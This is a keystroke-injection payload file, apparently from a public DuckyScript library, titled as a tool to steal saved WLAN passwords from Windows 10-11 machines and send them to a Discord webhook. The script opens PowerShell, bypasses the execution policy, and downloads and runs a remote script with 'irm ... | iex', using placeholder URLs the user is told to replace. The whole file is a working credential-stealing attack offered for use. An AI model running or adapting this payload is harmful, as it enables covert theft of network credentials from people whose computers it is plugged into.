Path: blob/master/payloads/library/credentials/WLAN-Windows-Passwords/v.2.0_by_truelockmc/payload.txt
2971 views
REM ###################################################################1REM # |2REM # Title : WLAN-Windows-Passwords-Discord-Exfiltration |3REM # Author : true_lock |4REM # Description: A script used to steal target WLAN Passwords. |5REM # Category : Credentials |6REM # Target : Windows 10-11 |7REM # Version : 2.0 |8REM # |9REM ###################################################################1011REM Browser History to Discord Webhook1213GUI r14STRINGLN powershell15STRINGLN Set-ExecutionPolicy Bypass -Scope Process -Force1617REM Replace the example urls with your real ones18DEFINE #SCRIPT_URL https://example.com/script.ps119DEFINE #WEBHOOK https://discord.com/api/webhooks/2021REM Saved WiFi Info to Discord Webhook22STRINGLN $whuri='#WEBHOOK'; irm #SCRIPT_URL | iex2324STRINGLN exit252627